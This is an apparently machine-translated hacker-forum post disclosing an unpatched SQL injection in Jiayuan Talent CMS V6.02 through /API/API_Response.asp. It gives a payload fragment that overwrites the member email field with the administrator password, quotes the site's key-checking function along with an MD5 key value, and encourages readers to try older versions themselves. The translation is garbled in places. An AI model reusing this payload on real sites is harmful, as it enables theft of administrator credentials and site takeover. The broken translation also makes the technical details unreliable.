What is the last injection vulnerability in the jiayuan talent cms system? (0 day)

Vulnerability Author: phantom spring [B .S.N]
Vulnerability Source: http://www.hacker.com.cn
Download source code.
Program version: jiayuan talent CMS system V6.02 (I tested only 6.02. Let's test the old version by yourself .)
Vulnerability level: high
Vulnerability description:
/API/API_Response.asp

The injection vulnerability occurs because the ip address is not filtered and updated.
If there are many access restrictions. However, you can test the code.

Code:
, Member_email = dFirst (JOB_pass, JOB_admin), Member_url = aaa

In this way, the password is updated to the email.

To analyze this vulnerability, you also need to analyze the following code.

Code:
Function CheckSysKey (iName, iSysKey) username = huanquan syskey
If IsNull (iName) Or iName = "" Or IsNull (iSysKey) Or iSysKey = "" If all are empty, end the call.
CheckSysKey = False
Exit Function
End If
If Len (iSysKey) = 32 Then If the syskey length is 32, get 9-16 digits
ISysKey = Mid (iSysKey, 9, 16)
End If
Dim strFRKey, strFRKeyNew
StrFRKey = Md5 (iName & API_SysKey, 16) baf588a6ba715854
StrFRKeyNew = Md5 (iName & API_SysKey, 16) baf588a6ba715854
If LCase (iSysKey) = LCase (strFRKey) Or LCase (iSysKey) = LCase (strFRKeyNew) Then
CheckSysKey = True
Else
CheckSysKey = False
End If

I will only introduce the vulnerability exploitation code. You can view the program on your own.